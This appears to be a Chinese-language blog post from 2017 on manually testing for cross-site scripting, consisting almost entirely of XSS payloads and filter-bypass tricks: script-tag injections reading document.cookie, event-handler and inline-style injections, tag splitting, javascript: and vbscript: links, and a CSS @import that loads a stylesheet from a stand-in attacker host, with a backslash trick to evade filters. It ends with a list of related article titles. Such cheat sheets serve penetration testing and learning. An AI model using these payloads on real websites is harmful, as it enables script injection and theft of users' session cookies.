XSS漏洞手工检测
2017-12-15 14:35
246 查看
xss漏洞手工检测
xss漏洞手工检测1基本检测
2绕过技巧
2017年12月14日 17:44:57
1、基本检测
'"<>&空格 \\看有没有逃逸 常用语句 "/><script>alert(document.cookie)</script><!-- <script>alert(document.cookie)</script><!-- "onclick="alert(document.cookie) <script>alert("XSS")</script> <script src="http://xss.io/a.js"></script> <div onclick="alert('xss')"> <div onmouseenter="alert('xss')">
2、绕过技巧
常用绕过另一个绕过的办法就是在属性和= 之间插入一个空格: <div onclick ="alert('xss')"> <scr<script>ipt>alert("XSS")</scr<script>ipt> 行内样式 <div style="color: expression(alert('XSS'))"> <div style="color: '<'; color: expression(alert('XSS'))"> <a href="javascript:alert('xss')">link</a> //url中输入 <a href='vbscript:MsgBox("XSS")'>link</a> //老IE或者兼容模式的IE11 '-confirm`1`-' '-confirm(1)-' 利用字符编码 %c1;alert(/xss/);// 绕过长度限制 "onclick=alert(1)// "><!-- --><script>alert(xss);<script>
CSS import绕过
IE 浏览器支持在 CSS 中扩展 JavaScript,这种技术称为动态特性(dynamic properties)。允许攻击者加载一个外部 CSS 样式表是相当危险的,因为攻击者现在可以在原始页面中执行
<style> @import url("http://attacker.org/malicious.css"); </style> malicious.css: body { color: expression(alert('XSS')); } 为了绕过对 @import 的过滤,可以在 CSS 中使用反斜杠进行绕过: <style> @imp\ort url("http://attacker.org/malicious.css"); </style> IE 浏览器会接受反斜杠,但是我们绕过了过滤器。
相关文章推荐
- 基于网络爬虫的XSS漏洞检测技术
- 【安全牛学习笔记】手动漏洞挖掘-SQL注入XSS-简介、跨站脚本检测和常见的攻击利用手段
- 快速、直接的XSS漏洞检测爬虫 – XSScrapy
- php taint检测XSS/SQL/Shell注入漏洞
- Xss漏洞检测
- TamperIE - 一个小巧的XSS漏洞检测辅助工具
- iOS 安全模型浅析(四) ---- 防御代码漏洞和越狱检测
- Linux Dirty COW(脏牛)漏洞介绍及检测
- 代码漏洞检测工具整理
- 一个检测OpenSSL心脏出血漏洞的Python脚本分享
- 【图解漏洞】图解跨站脚本攻击(XSS)原理
- Discuz! 7.2的一个XSS漏洞
- 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】
- XSS学习笔记(四)-漏洞利用全过程
- 通过Web安全工具Burp suite找出网站中的XSS漏洞实战(二)
- 第四章:iOS应用漏洞利用 ——4.14 UIWebViews与XSS
- 常见web漏洞——防止常见XSS 过滤 SQL注入 JAVA过滤器filter
- 解决webx的xss和csrf漏洞
- Java Web开发 - 持久型/存储型XSS漏洞
- 教你玩转XSS漏洞